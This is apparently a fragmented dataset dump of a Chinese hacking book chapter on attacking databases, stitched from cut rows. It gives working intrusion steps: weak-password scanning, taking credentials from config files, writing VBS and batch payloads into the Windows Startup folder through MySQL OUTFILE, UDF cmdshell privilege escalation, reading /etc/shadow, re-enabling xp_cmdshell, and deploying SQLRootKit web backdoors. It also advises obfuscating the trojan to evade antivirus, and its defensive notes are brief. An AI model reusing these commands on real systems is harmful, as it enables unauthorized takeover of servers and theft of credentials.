text
stringlengths 64
2.99M
|
---|
图3-54 MD5解密 3.5.5 MD5(Base64)原理 在线生成Hash值,然后按照3.5.4节中的步骤重新测试,结果与之测试吻合,由此我们可以推测出MD5(Base64)的加解密原理。 1.MD5(Base64)加密原理 MD5(Base64)加密,首先对字符串进行MD5加密,即MD5(string),然后对MD5加密后的字符串进行Base64编码。 2.MD5(Base64)解密原理 MD5(Base64)解密,先对MD5(Base64)进行Base64解码,再对Base64解码后的值通过二进制方式进行读取,结果应为32位字符串,最后对获取的32位字符串进行MD5解密。 |
未知 3.6 通过网页文件获取数据库账号和口令 动态网页的显著特点之一就是与数据库的交互,只要涉及大型数据库,动态网页调用其数据库时一般都需要数据库账号和密码。这些大型数据库主要以SQL Server和Oracle为代表。Access数据库一般不设置密码,即使设置了密码,也可以使用Access密码查看器获取其密码。网站或者信息系统在调用数据库时需要进行连接,考虑到执行效率和编码效率等原因,一般都将数据库连接等单独写成一个模块,这些文件主要用来连接数据库。在这些文件中会包含数据库服务器的IP地址、数据库类型、数据库用户账号和密码等信息。 控制或者获取一个Shell后,通过查看index.asp、index.php及index.jsp等文件,从中获取数据库连接文件。数据库连接文件的名称比较容易识别,如conn.asp、dbconn.asp等,这些文件可能出现在网站根目录、inc文件夹、includes文件等处。通过查看这些网页文件,可以获取数据库IP地址、数据库用户账号及口令,利用获取的信息可以进行计算机渗透、提权甚至实施完全控制。 3.6.1 确认网站脚本类型 主要通过打开网站并访问其网站中的网页来确认网站脚本类型。在本例中,打开IE浏览器,在其地址栏中输入IP地址“61.*.*.*”,打开网站,如图3-56所示。在浏览器状态栏中可以看到详细的地址和文件显示,本例为“http://*.*.*.*/shi.asp”,说明该网站的脚本类型为ASP。 图3-56 获取网站脚本类型 技巧 (1)可以直接通过在浏览器地址栏输入“http://*.*.*.*/index.asp”、“http:// *.*.*.*/index.php”、“http://*.*.*.*/index.jsp”等判断网站的类型,规则是“IP地址+文件名”,文件名可以是index.asp(jsp/php/aspx),也可以是default.asp(jsp/php/aspx)等。 (2)如果打开网页后还是无法确定该网站的类型,则可以通过单击网站中的链接地址来确定。如果打开的网页后缀为 .asp,则网站脚本类型为ASP,其他脚本类型判断原理相同。 (3)打开“Internet信息服务(IIS)管理器”窗口,单击“网站属性”中的“文档”选项,可以获取该网站的默认文档名称。 3.6.2 获取网站目录位置 利用漏洞攻击的方法获取该系统的用户账号和口令后,可以通过Radmin远程控制软件直接进行完全控制。进入系统后,在桌面发现了“Internet信息服务”快捷键,双击该快捷键打开“Internet信息服务(IIS)管理器”窗口,依次展开目录至网站,选中“web”网站文件夹,单击右键,在弹出的快捷菜单中选择“属性”选项,打开Web属性窗口,如图3-57所示。然后,切换到“主目录”标签页获取其网站根目录“D:\*”。 图3-57 获取网站根目录位置 说明 在本案例中,操作系统为Windows 2003 Server,因此其Web目录与Windows 2000 Server不同,但操作大致相同。打开IIS管理器后,查找网站目录并展开即可获知网站的具体位置。 3.6.3 查看网页脚本并获取数据库连接文件 在3.6.2节我们获取了网站文件的物理路径。通过资源管理器访问网站根目录,然后使用“记事本”程序打开首页文件index.asp,如图3-58所示,从中可以获取网站数据库连接文件,这个文件极有可能是 i_include/database_.asp。 图3-58 查看网站首页文件 3.6.4 获取数据库用户账号和密码等信息 在网站根目录中打开i_include文件夹,在其中找到database_.asp文件。使用“记事本”程序打开该文件,其脚本如图3-59所示。通过该脚本内容可知,数据库类型为SQL Server,数据库服务器地址为本地(Local),用户为“sa”,密码为“111”,数据库为“j***”。通过该文件中的“conn.DefaultDatabase="job_demo21_data_new"”语句还可以知道,该系统极有可能来自网上。 图3-59 获取数据库的用户及密码等信息 3.6.5 实施控制 在本案例中,如果数据库不是本地数据库,则可以通过注册SQL Server或者直接使用SQLTools连接,进行添加用户和密码、执行命令等操作。 3.6.6 防范措施 一种防范措施是通过VB等编程语言将数据库连接模块写成dll,使用时在系统中注册即可。不过,对托管在虚拟主机上的个人网站来说,注册dll比较麻烦。 另一种防范措施是使用微软自带的SCRENC软件进行加密。 3.6.7 小结 本案例利用漏洞攻击获取了系统的用户和密码,通过系统中的原有远程控制软件,轻松得到了数据库账号和密码等信息。 |
在网络入侵过程中,对数据库的攻击也是典型的攻击手段之一,加之目前市面上很多安全检测和入侵软件均具有数据库口令扫描功能,所以一旦获取数据库中sa用户的口令,入侵者就可以执行添加用户等危险命令,数据库很容易被入侵者完全控制。 常见的数据库攻击主要有以下几种。 (1)通过互联网直接连接进行攻击 数据库要想正常使用,必须开放1433(1434)或者指定端口。 |
(2)安全漏洞扫描 安全漏洞扫描通常是指针对操作系统、网络应用程序或者数据库系统本身的弱点进行扫描。 攻击者在安全扫描过程中可以很轻松地发现没有使用SQL安全补丁、互联网信息服务(IIS)设置弱点及SNMP(简单网络管理协议)等漏洞并实施攻击,从而攻破数据库。 入侵者在攻击过程中可能使用公开的工具,也可能使用专用工具,还可能利用一些大型公司提供的安全扫描程序,如Qualys的普通扫描工具QualysGuard、SPI Dynamics的网络应用程序扫描工具WebInspect等。 |
Application安全公司的AppDetective和NGS软件公司的NGSSQLCrack等商业性工具软件都有破解sa口令的功能,还有一些扫描工具软件也可以很好地破解sa口令。 |
(5)直接利用安全漏洞攻击 可以利用Metasploit等工具软件直接实施攻击。 Metasploit利用在正常的安全漏洞扫描过程中发现的安全漏洞实施攻击,这种攻击手段非常有效,攻击者还可利用这种手段突破系统、进行代码注入或者取得未经授权的命令行访问权限。 (6)SQL注入攻击 SQL注入攻击是目前网络上最为流行的一种攻击方式,主要通过构建SQL语言脚本实施攻击。 目前网上有很多流行的SQL注入攻击工具,如“教主”的HDSI 3.0、“明小子”的Domain 3.5等。 |
(7)Google hacks Google hacks利用Google搜索引擎不同寻常的力量搜索出可公开访问的系统泄露的SQL服务器错误,如“Incorrect syntax near”,黑客能够使用Google找到口令、网络服务器中的安全漏洞、基本的操作系统、公开提供的程序及其他能够用来攻破SQL服务器系统的东西。 |
(8)熟读网站源代码,寻找0day漏洞 目前,很多网站的BBS、Blog、文章系统、内容管理系统都是使用公开发行的版本,通过阅读这些公开程序的源代码,研究和分析系统代码中存在的问题(这些问题极有可能是0day漏洞),找到问题以后就可以利用并实施攻击和控制。 |
3.7.1 设置Hscan 运行Hscan,分别设置一个扫描IP段的起始地址和结束地址,然后在扫描模块中只选中“check MSSQL weak accounts”选项,如图3-60所示。 |
图3-61 Hscan扫描结果 说明 (1)Hscan.log文件在每次扫描时对内容完全进行覆盖,不保留以前的扫描记录,因此,每次扫描结束后,必须更改文件名或者另存为其他文件。 |
3.7.3 连接数据库 选中类型为“MSSQL”的记录,在扫描结果区域单击左键,选择“connect”命令直接连接数据库,连接成功以后如图3-62所示。 图3-62 连接MSSQL数据库 注意 在选择记录时一定要小心,右键是清除记录命令(Clean),左键是连接命令(Connect),清除扫描结果以后不能恢复。 |
3.7.4 执行命令 在SQLCMD提示符下分别输入命令“net user”、“net user aspnet aspnet****”、“net localgroup administrators aspnet /add”,查看并添加“aspnet”用户,口令为“aspnet****”,提升“aspnet”用户的权限到Administrators组中,如图3-63所示。 |
图3-63 执行命令 说明 (1)由于这种弱口令的MSSQL服务器极有可能有多个入侵者进行了扫描,入侵者在入侵成功后会将一些存储过程删除,导致SQLCMD能够连接却不能执行命令。 |
这个时候,可以通过SQL查询分析器连接该数据库,连接成功后即可查看数据服务器中的数据库,将数据库中表的内容(如user表等)配合Web实施控制。 |
图3-64 查看所有管理员用户 3.7.5 执行其他控制命令 在DOS命令提示符界面输入“psexec \\218.*.*.212 cmd -u aspnet -paspnet2005”,找出一个DOSShell,可以在该Shell中上传木马程序、开启3389远程终端服务等。 |
目前使用MySQL数据库的服务器一般与Web服务器结合得比较紧密,通过查看MySQL数据库中有关用户及密码信息的表,特别是含有管理员信息的表,结合WebShell等,就可以实施控制。 |
3.8.1 设置Hscan 图3-65 设置MySQL扫描参数 设置扫描的起始IP地址和结束IP地址,在扫描模块中选择“check MySQL weak account”选项,如图3-65所示。 设置完毕,在“menu”菜单中选择“start”选项,开始扫描MySQL弱口令。 |
连接成功后会出现MySQL的提示符,在其中输入“show databases;”命令查看数据库服务器中的数据库,如图3-67所示。 图3-67 连接并查看MySQL数据库服务器中的数据库 说明 (1)MySQL数据库开放的端口是3306,如果不使用HScan软件直接进行连接,可以使用MySQL数据库连接命令进行连接。 |
“show databases;”命令用于查看数据库服务器中的数据库,“show tables;”命令用于查看当前数据库中的表,“use databasename;”命令表示数据库名称为“databasename”的数据库为当前数据库。 |
3.8.4 创建表并将VBS脚本插入表 依次运行以下命令,完成后如图3-68所示。 show databases; use test; show tables; create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnet aspnettest/add"",0)"); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " ); select * from a; 图3-68 创建表并将VBS脚本插入表 3.8.5 将VBS脚本导出到启动选项中 使用以下命令将刚才在a表中创建的VBS脚本导出到启动选项中。 |
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开 始」菜单\\程序\\启动\\a.vbs"; 导入成功后,系统重新启动时会自动添加密码为“1”且用户名为“1”的用户到管理员组中。 |
show databases ; use test; show tables; create table b (cmd text); insert into b values ("net user Aspnet 123545345!* /add"); insert into b values ("net localgroup administrators Aspnet /add"); insert into b values ("del b.bat"); select * from b into outfile "C:\\Documents and Settings\\All Users\\「开 始」菜单\\程序\\启动\\b.bat"; 该脚本执行后会闪现DOS窗口,如果有权限导入启动选项中,则一定会执行成功。 在虚拟机中通过MySQL连接器连接并执行以上命令后,在“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”目录中会有刚才导出的b.bat脚本文件,如图3-70所示。 图3-70 导出bat脚本到启动选项 说明 在不同的操作系统中,“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”目录文件名称可能会不同,这个时候将其换成相应的目录名称即可。 |
select * from b into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\b.bat"; 3.8.6 等待重启和实施控制 如果该计算机开放了3389端口,可以直接进行连接; |
通过“show databases;”、“show tablesname;”、“select * from tablesname;”等命令可以获取表中的具体内容,而通过查看其中的内容可以进行Web服务器域名信息及一些网站管理员的密码和用户名称的定位。 |
图3-72 获取额外信息 3.8.7 小结 本例通过HScan扫描MySQL口令,扫描出口令以后,借助HScan的MySQL连接功能直接连接MySQL,通过创建表将VBS脚本插入表中,然后再导出到系统的启动目录下,系统重新启动以后,会自动添加用户,进而通过远程终端3389连接该MySQL服务器所在的计算机,成功实施控制。 |
未知 3.9 巧用Cain监听网络获取数据库口令 Cain是一款强大的网络嗅探工具,在网络渗透方面具有优势,尤其是Sniffer。Cain主要用于Windows平台的嗅探。Cain在嗅探FTP、POP3、网站登录密码、Telnet及数据库密码等方面有很大的优势。早期版本的Cain还能嗅探远程终端的密码,通过分析RDP协议数据直接获取远程终端的密码,后来由于远程终端采取了一些安全措施,所以使用Cain嗅探获取的RDP包数据就是加密的了。由于Cain的强大嗅探功能,目前很多杀毒软件都将其列为危险软件,并对其进行查杀。因此,在直接安装或者采用简略版安装Cain时,要注意系统使用的杀毒软件,在必要时可以先关闭杀毒软件,在完成嗅探后重新开启杀毒软件。 本节介绍Cain在网络监听方面的应用,以及如何制作非安装版的Cain。 3.9.1 安装和配置Cain 图3-73 配置Cain Cain的安装比较简单,按照提示完成即可。安装Cain后,需要安装WinpCap抓包软件,Cain才能正常使用。 运行Cain软件,选择网卡进行配置。Cain运行后会自动将计算机中的网卡IP地址、子网掩码等显示出来。在“Sniffer”选项卡中选中“Options”设置区的所有选项,如图3-73所示,其他保留默认设置即可。配置完毕,在Cain主界面的左下角中单击圆形图标,开始监听。 3.9.2 查看Sniffer结果 在Cain主界面依次选择“sniffer”→“password”选项,然后在右边的“Passwords”列表中选择括号中数字大于0的选项。括号中的数字表示Cain监听到的有关密码数据的条数。选中某个条目,在右边区域会显示监听的详细结果。 选择“SMB(2)”,如图3-74所示,可以看到相应记录的“Timestamp”(时间戳)、“SMB Server”、“Client”、“Username”、“Domain”、“Password”、“AuthType”等信息。由于其监听的密码为空,所以计算机的IP地址为192.168.1.60,Administrator用户的“Password”栏中没有数据。 图3-74 SMB监听结果 3.9.3 直接获取系统中有关保护存储的账号和密码 在Cain中选择“Protected Storage”选项卡,可以看到保存在系统中的有关网站的用户名和密码,如图3-75所示,获取这些信息后可以直接登录网站并进行相应的操作。 图3-75 获取存储在系统中的密码 3.9.4 查看数据库密码 在本案例中,由于存在SQL Server数据库,因此当客户端连接SQL Server数据库服务器时,其用户名和密码均可以通过Cain截获。如图3-76所示,SQL Server客户端的地址为192.168.1.61,使用数据库账号“sa”、密码“JJF***2000”连接IP地址为192.168.1.60的SQL Server数据库服务器。 图3-76 查看截获的SQL Server数据库账号和密码 3.9.5 小结 本案例通过安装和配置Cain对内网进行监听和嗅探,在嗅探过程中获取了SMB密码和SQL Server数据库的账号和密码。可以使用Psexec.exe和SQLTools等工具对获取了账号和密码的计算机实施控制。 |
未知 3.10 MySQL数据库提权 MySQL数据库是目前使用最多的数据库之一,其流行的架构为PHP+MySQL+ Apache,支持Linux和Windows操作系统。在Web渗透过程中,通过WebShell有可能获得MySQL的安装目录,通过下载MySQL数据库的user.myd表,能够方便地破解root用户的密码。root用户的密码还可能从网页脚本文件中获得。以root用户的身份可以直接登录数据库。在获得root用户的密码后,通过导出udf.dll函数,在条件合适的情况下,可以获得服务器权限。 下面以一个实例来介绍如何通过MySQL的root用户进行提权。 3.10.1 设置MySQL提权脚本文件 将MySQL提权脚本文件上传到服务器,运行后需要对IP地址、UID、密码、数据库进行配置。如图3-77所示,IP地址一般可以设置为localhost、127.0.0.1及真实的IP地址,UID默认为root,其他具有root用户权限的用户名称也可以使用,密码为具有root权限的用户的密码,数据库默认选择MySQL数据库,单击“提交查询内容”按钮进行连接测试。 图3-77 设置MySQL提权脚本文件 3.10.2 进行连接测试 连接成功后,会给出相应的提示,如图3-78所示,包括用户、数据库、数据目录(datadir)、基本目录(basedir)、版本、插件路径、MySQL函数等信息。 图3-78 连接测试 3.10.3 创建shell函数 单击“Dump UDF”按钮将UDF.DLL文件导出到默认的插件目录下,单击“Create Function”按钮创建shell函数。如图3-79所示,如果前面已经创建了shell函数,会提示该函数已经存在。 图3-79 创建shell函数 3.10.4 查看用户 在查询文本框中输入“select shell('cmd','net user')”,查看系统中所有的用户。如图3-80所示,可以正常查看系统中的所有用户信息。 图3-80 查看用户 3.10.5 创建具有管理员权限的用户 分别在查询文本框中输入脚本“select shell('cmd','net user temp temp123456')”、“select shell('cmd', 'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加用户“temp”,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员权限,执行成功后如图3-81和图3-82所示。 图3-81 添加temp用户 图3-82 将temp用户添加到管理员组 3.10.6 提权成功 图3-83 查看管理员用户 在SQL查询文本框中输入“select shell('cmd','net localgroup administrators')”命令查看刚才添加的用户是否添加成功,如图3-83所示,查询结果表明已经将temp用户添加到管理员组中。 目前很多网站都会提供远程终端服务,只要用户添加成功,就可以直接登录该服务器。如图3-84所示,输入用户名和密码,成功进入该服务器,至此,就通过MySQL的root用户成功提权。 图3-84 成功进入服务器 3.10.7 小结 通过本例中的方法可以快速将WebShell权限提升到服务器权限。当然,还有其他方法可以通过MySQL提权。下面对经常用到的一些有关MySQL的提权命令和方法进行总结。 1.UDF提权的常用命令 UDF提权的常用命令如下。 create function cmdshell returns string soname 'udf.dll' select cmdshell('net user antian365 123!@#abcABC /add'); select cmdshell('net localgroup administrators antian365 /add'); select cmdshell('net localgroup administrators '); select cmdshell('ipconfig /all'); select cmdshell('net user'); select cmdshell('regedit /s d:\wwwroot\3389.reg'); drop function cmdshell; select cmdshell('netstat -an'); 2.VBS启动项提权 先通过WebShell连接数据库,通过建立表a将VBS脚本写入表中,然后导入启动项。该脚本仅对中文版本有效,如果使用其他语言版本的操作系统,仅需对“C:\\ Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs”这个脚本进行相应更改。在VBS脚本后面有一个“0”,表示不弹出CMD窗口,以静默模式运行。该方法是在通过UDF提权失败的情况下,将VBS插入启动项中,待系统重启后将自动添加一个用户,示例如下。 create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"") " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user antian 123!@#$% /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators antian /add"",0) " ); select * from a into outfile "C:\\Documents and Settings\\All Users\\「开 始」菜单\\程序\\启动\\a.vbs"; 3.Linux下的MySQL提权 Linux下的MySQL提权命令如下。 mysql -h localhost -uroot -p system useradd hacker system passwd hacker system tail -l /etc/passwd system tail -l /etc/shadow |
尤其是在网络高度发达的今天,只要企业的数据库出现问题,网上马上就会出现一些“爆料”——不管是玩笑还是恶意,总之,数据库的安全不容小视。 |
虽然维护数据库的安全是DBA或者安全管理人员的职责,但普通技术人员也应该了解相关内容,毕竟多掌握一门技能,就多一份成功的希望和保证。 |
(1)Notification Services增强功能 Notification Services是一种新平台,是用于生成、发送并接收通知的高伸缩性应用程序,可以把即时的、个性化的消息发送给使用各种各样设备上的数以千计乃至百万计的订阅方。 |
(4)数据库引擎增强功能 数据库引擎引入了新的可编程性增强功能(例如,与Microsoft .NET Framework的集成,以及Transact-SQL的增强功能)、新的XML功能和新的数据类型,还包括对数据库的可伸缩性和可用性的改进。 (5)数据访问接口方面的增强功能 SQL Server 2005提供了Microsoft数据访问(MDAC)和.NET Frameworks SQL客户端程序方面的改进,为数据库应用程序开发人员提供了更好的易用性、更强的控制和更高的工作效率。 |
操作方式不同:SQL Server 2005是通过SQL Server Management Studio管理数据库的,因此可以依次单击“开始”→“程序”→“Microsoft SQL Server 2005”→“SQL Server Management Studio”选项打开数据库管理综合控制台。 |
提供的服务增多:通过服务管理器可以看到,SQL Server 2005增加了很多服务,如SQL Server Directory Helper、SQL Server Browser、SQL Server Vss Writer和SQL Server Integration Services,如图3-85所示。 图3-85 SQL Server 2005增加的一些服务 管理控制台操作界面改动较大:SQL Server 2005将数据查询整合到一起,以前通过查询分析器进行的操作,现在直接整合在数据库管理中了,比以前方便、快捷。 其他改进:SQL Server 2005在功能上改进较多,需要用户自己体会。 |
下面就介绍如何还原一个备份的SQL Server 2005数据库。 3.11.2 还原和备份SQL Server 2005数据库 备份数据库的理由很多,有的是为了防止出现意外,有的是开发需要,有的是入侵后将数据库还原打包,所有的备份的目的都是为了在需要的时候还原。 恢复SQL Server 2005数据库的前提是在本机搭建了SQL Server 2005数据库平台,即安装了能够使用的SQL Server 2005数据库,且已经将备份文件放置在本地计算机中。 |
01 连接数据库引擎 第一次打开SQL Server Management Studio时,会自动弹出“连接到服务器”对话框,如图3-86所示,保持“服务器类型”、“服务器名称”及“身份验证”下拉列表的默认设置即可。 图3-86 连接服务器 如果已经打开SQL Server Management Studio,则可以依次单击菜单栏上的“文件”→“连接对象资源管理器”选项,打开“连接到服务器”对话框,然后单击“连接”按钮。 连接成功后,将打开“SQL Server Management Studio ”控制台窗口,如图3-87所示。 图3-87 SQL Server Management Studio 控制台 02 还原数据库操作 在SQL Server Management Studio控制台窗口选中数据库或者系统数据库,然后单击右键,在弹出的快捷菜单中选择“还原数据库”选项,打开“还原数据库”窗口,如图3-88所示。 |
如果是数据库在线还原,就选择“源数据库”选项; 如果是从物理文件还原,则选择“源设备”选项。 图3-88 还原数据库设定 03 添加备份文件的位置 单击选中“源设备”单选按钮,然后单击文本框右边的“...”按钮,在弹出的“指定备份”对话框中添加备份的位置,如图3-89所示。 图3-89 指定备份位置 04 定位备份文件 在“指定备份”对话框中单击“添加”按钮,会弹出“定位备份文件”对话框。 |
默认情况下,SQL Server 2005会直接定位到其安装目录下的“MSSQL.1/MSSQL/Backup”目录,如图3-90所示,默认显示“*.bak”和“*.trn”两种备份文件。 |
图3-90 定位备份文件 图3-91 选择要还原的备份数据库文件 技巧 可以将所有备份文件都复制到“C:\Program Files\Microsoft SQL Server\MSSQL.1\ MSSQL\Backup”目录下,这样选择起来比较方便。 单击“确定”按钮完成文件的选择,回到“指定备份”对话框,如图3-92所示,单击“确定”按钮完成备份文件的选择。 图3-92 完成备份文件的选择 05 完成“还原的目标”和“还原的源”的设定 如图3-93所示,在“还原数据库”窗口的列表中选择需要还原的文件,在“还原的目标”设置区输入“uniport”,表示还原后的数据库名称是“uniport”。 单击“确定”按钮还原数据库,如图3-94所示。 图3-93 完成“还原的目标”和“还原的源”的设定 图3-94 还原数据库 06 对还原错误的处理 进行还原数据库操作时,我们可能会遇到即使按照上面的步骤也无法还原数据库的情况。 |
按照“E:\Program Files\Microsoft SQL Server\MSSQL\Data”路径,分别在E盘根目录下建立“Program Files”文件夹,然后在“Program Files”文件夹下建立“Microsoft SQL Server”文件夹,在“Microsoft SQL Server”文件夹下建立“MSSQL”文件夹,在“MSSQL”文件夹下建立“Data”文件夹,如图3-96所示,然后按照前面的步骤重新选择,即可完成数据库的还原。 在SQL Server 2005中,如果还原时出现如图3-95所示的错误,只要直接建立相应的文件夹便可解决,这对于体积较大的数据库(超过1GB)还原来说无疑是福音。 图3-96 建立相应的文件夹 笔者曾经探讨过如何在SQL Server 2000中恢复一些较难恢复的数据库,即只有一个备份的数据库,没有任何其他信息。 |
采用几种方法,包括从互联网上寻找他人的数据库还原故障解决方案,逐个进行测试,均未解决。 笔者根据错误提示,大胆设想,终于成功恢复了数据,下面就将整个过程与读者分享。 1.常规数据库恢复方法 01 在SQL Server 2008企业管理器中新建名为“ChinaData”的数据库。 02 选择备份文件ChinaData.bak并进行恢复。 恢复过程中出现错误提示框,如图3-97所示,没有错误号码,表示数据库恢复失败。 对该数据库再次进行还原,并选择“强制还原”选项(即覆盖现有数据库),结果还是显示错误。 图3-97 数据库恢复错误提示 2.通过查询语句进行数据库恢复 通过百度搜索,获取3154错误的解决方法,其恢复过程会提示“备份集中的数据库备份与现有的数据库不同”,如图3-98所示。 |
use master restore database CSS_CMS from disk = 'F:\xx路径\file'--备份的数据库文件路径名 with replace, MOVE N'XXX_Data' TO N'F:\要保存的路径\Data\XXX.mdf', MOVE N'XXX_log' TO N'F:\要保存的路径\Data\XXX.ldf' 一般情况下,通过以上方法就可以恢复,但在本例中,经过测试,该方法行不通。 |
(2)还原路径不存在 对这种错误,需要手动修改路径,只要路径确实存在,就可以解决。 (3)还原路径文件有重名 这种错误出现的原因是还原的文件恰好在默认位置有同名文件,无法覆盖。 |
笔者对以上3个可能出现的问题进行了测试和修正,还是没有解决问题,于是只好查看SQL Server 2008的日志文件,如图3-99 所示,但仍然没有找到解决的办法。 图3-99 查看日志文件 再次对数据库进行还原,发现原始文件名在“将数据库文件还原为”列表中全部为同一个名称,怀疑是文件名称不一致,如图3-100所示。 |
图3-100 原始文件名与还原名称一致性问题 依次按照原始文件名,在还原中将chinadata. mdf和chinadata.ndf进行对应。 例如,原始文件名为“ChinaData_9”,则应在还原中修改为“chinadata_9.mdf”和“chinadata_9.ndf”进行对应。 |
未知 3.12 SQLRootKit网页数据库后门控制 通过本节,读者可以了解网页数据库后门SQLRootKit的相关知识,以及如何使用SQLRootKit 1.0、SQLRootKit 3.0数据库后门来控制计算机。 SQLRootKit是一种网页脚本,用于执行数据库命令,使用前提是知道数据库的账号和密码。SQLRootKit目前有两种:一种是针对PHP语言的,其针对的数据库为MySQL;另外一种是针对ASP语言的,主要针对的数据库为SQL Server,ASP版本的SQLRootKit有两个版本,即1.0版和改进后的3.0版。 3.12.1 使用SQLRootKit 1.0网页后门控制计算机 在获取网站的数据库的类型、数据库用户密码和用户名后,直接将SQLRootKit.asp文件上传到网站目录中,然后在浏览器地址栏中输入地址并打开网站。打开网站后,在分别在“SQL用户名”和“SQL密码”文本框中输入获取的SQL用户名“sa”和密码“***”,然后在“执行命令”按钮前的文本框中输入需要执行的命令,如“net user”,查看系统中的所有用户。输入完毕,单击“执行命令”按钮,会在该网页中显示执行结果,如图3-101所示。 说明 (1)目前很多杀毒软件都会对SQLRootKit 1.0网页木马进行查杀,因此在使用前最好用一些网页加密软件对其进行加密。 (2)SQLRootKit 1.0只能利用本地的SQL Server数据库来执行命令,如果数据库服务器和Web服务器不在同一台计算机上,SQLRootKit 1.0就无能为力了。 (3)经过加密的SQLRootKit 1.0网页木马,其WebShell相当于一个DOSShell。如果未在数据库服务器中删除一些比较危险的dll组件,则该后门可以长期存在。 图3-101 在SQLRootKit 1.0中执行命令 3.12.2 使用SQLRootKit 3.0网页后门控制计算机 使用SQLRootKit 3.0网页后门控制计算机的步骤如下。 01 运行测试 运行SQLRootKit 3.0网页后门程序,将SQLRootKit 3.0网页后门直接上传到网站目录,然后在浏览器中输入其对应地址即可,运行界面如图3-102所示。 图3-102 运行SQLRootKit 3.0网页后门 说明 (1)在SQLRootKit 3.0网页后门中,需要输入“SQL用户名”、“SQL密码”、“SQL服务器”及“SQL端口”等信息,程序默认SQL Server服务器与Web服务器在同一台计算机上。 (2)输入“SQL用户名”、“SQL密码”、“SQL服务器”及“SQL端口”信息,通过验证才能进行后续操作。 02 登录SQLRootKit 3.0网页后门 输入“SQL用户名”和相应的“SQL密码”密码后,单击“Login”按钮,验证正确后进入SQLRootKit 3.0网页后门管理界面,如图3-103所示。 图3-103 进入SQLRootKit 3.0网页后门管理界面 03 检测组件 单击“检测组件”按钮,程序会自动检测服务器上是否存在XP_cmdshell、sp_oacreate、xp_regwrite及xp_servicecontrol这4个SQL组件,检测操作系统版本及执行权限等信息,并将这些信息显示在该页面上,如图3-104所示。 说明 如果检测出来的组件被系统管理员删除了,则可以单击“恢复组件”按钮进行恢复。 04 执行命令 在“系统命令”文本框中输入需要执行的命令,并选择运行程序的相应组件。在本例中选择“利用XP_cmdshell扩展”选项,并在“系统命令”文本框中输入“net user”命令,然后单击“执行”按钮,其结果会显示在网页中,如图3-105所示。XP_cmdshell扩展命令在执行过程中可能会显示一些错误信息,我们可以忽略这些信息。 图3-104 检测SQL组件 图3-105 执行命令 05 上传文件 在SQLRootKit 3.0网页后门中提供了文件上传功能,即在内容文本框中粘贴需要上传的文件的内容,在文件路径中输入需要保存的文件的物理路径。输入完毕,单击“保存”按钮即完成上传。 3.12.3 防范措施 对于SQLRootKit 3.0网页后门来讲,其主要防范措施如下。 勤杀毒。目前很多杀毒软件都能自动识别并查杀网页后门程序,因此,要及时升级杀毒软件病毒库并开启杀毒软件的所有监管选项。 首次完成网站建设后,要保存网站所有文件的列表。例如,可以在DOS下输入“dir d:\网站目录\*.* >mywebsite20071218.txt”命令,将网站的所有文件信息生成列表文件mywebsite20071218.txt。每次升级后都要重新次生成文件列表,每次维护时只要查看文件大小的变化即可。 使用一些网站监控软件进行实时监控。目前,国外和国内都有一些网站文件监控软件,一旦发现网站文件被改动,这些监控软件就会通过发送邮件或者手机短信等方式及时报警,方便管理员进行处理。 3.12.4 小结 本案例介绍了如何利用SQLRootKit 1.0及SQLRootKit 3.0网页后门来控制计算机。在很多情况下,一般的网页后门程序或者网页木马无法在服务器上执行命令。如果服务器上存在SQL Server服务器,入侵者在获取数据库用户和账号的情况下可以使用本案例介绍的方法来提权或者留下后门,以便守控肉机。 |
未知 3.13 SQL Server 2005提权 SQL Server 2005及SQL Server 2008都将“xp_cmdshell”等危险存储过程删除了,但这并不影响提权。只要获取了sa口令,重新添加存储过程,即可像MSSQL 2000 Server一样提权。SQL Server 2005提权的思路很简单,需要获取数据库的用户名和密码,然后通过恢复存储过程执行命令,下面是详细的提权过程。 3.13.1 查看数据库连接文件 通过WebShell查看网站的源代码,如图3-106所示,通过分析首页文件default.asp,获知数据库连接文件为openconnection.asp。 技巧 数据库连接文件的名称一般为conn.asp、openconnectiong.asp、connection.asp,这些文件多位于网站根目录或者“includes”等文件夹下,通过查看首页代码大都能准确找到数据库连接文件。 图3-106 分析首页文件 3.13.2 获取数据库用户和密码 找到数据库连接文件openconnection.asp,将其下载到本地并打开,如图3-107所示,知道数据库用户为“sa”,密码为“Tp*****234 ”,将其复制出来留待后面使用。 图3-107 获取数据库用户和密码 3.13.3 数据库连接设置 在连接SQL Server 2005之前,需要对数据库进行设置,需要知道sa用户的密码和数据库,默认采用master数据库。在“ConnString”输入框中修改相应的设置,主要是在数据库类型中选择相对应的数据库类型,在WebShell中单击“Database”,如图3-108所示,设置完毕后单击“Go”按钮进行数据库连接测试。 图3-108 设置MSSQL连接 3.13.4 查看连接信息 如果数据库用户名、密码及数据库名称均设置正确,连接成功后会显示相应的信息。例如,“MSSQL Version : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)及“SrvRoleMember : sa”,表明数据库版本为“icrosoft SQL Server 2005 -9.00.4035.00”,数据库用户角色是“sa”,如图3-109所示。 图3-109 获取数据库基本信息 3.13.5 添加xp_cmdshell存储过程 可以直接在“Run SQL”输入框中输入“Exec sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;”脚本添加xp_cmdshell存储过程,也可以通过WebShell进行。在“SQLExec”下拉列表中选择第3个命令选项“Add xp_cmdshell(SQL2005)”,如图3-110所示。 图3-110 添加xp_cmdshell存储过程 3.13.6 Windows本地提权 01 添加用户 在“SQLExec”下拉列表中选择“XP_cmdshell exec”选项,WebShell会自动给出脚本“Exec master.dbo.xp_cmdshell 'net user'”,修改其添加用户命令,即“Exec master.dbo.xp_cmdshell 'net user temp Wantian365.com!* /add '”,将添加用户“temp”,密码为“Wantian365.com!*”,如图3 111所示,单击“Query- 